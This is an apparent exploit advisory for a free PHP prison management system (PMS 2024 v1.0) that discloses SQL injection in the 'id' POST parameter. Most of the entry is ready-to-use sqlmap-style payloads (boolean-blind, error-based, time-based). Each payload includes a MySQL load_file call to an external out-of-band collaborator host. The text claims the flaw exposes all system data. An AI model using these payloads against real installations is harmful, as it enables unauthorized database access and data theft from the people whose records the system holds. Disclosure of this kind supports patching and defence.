Headline
PMS 2024 1.0 SQL Injection
PMS 2024 version 1.0 suffers from a remote SQL injection vulnerability.
## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi## Author: nu11secur1ty## Date: 07/06/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submittedin the id parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE(SELECT (CASE WHEN (4671=4671) THEN 0x31+(selectload_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+''ELSE 0x28 END)) AND 'apSt'='apSt Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE) Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' ANDEXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT(ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi---```## Reproduce:[href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html)## Time spent:01:37:00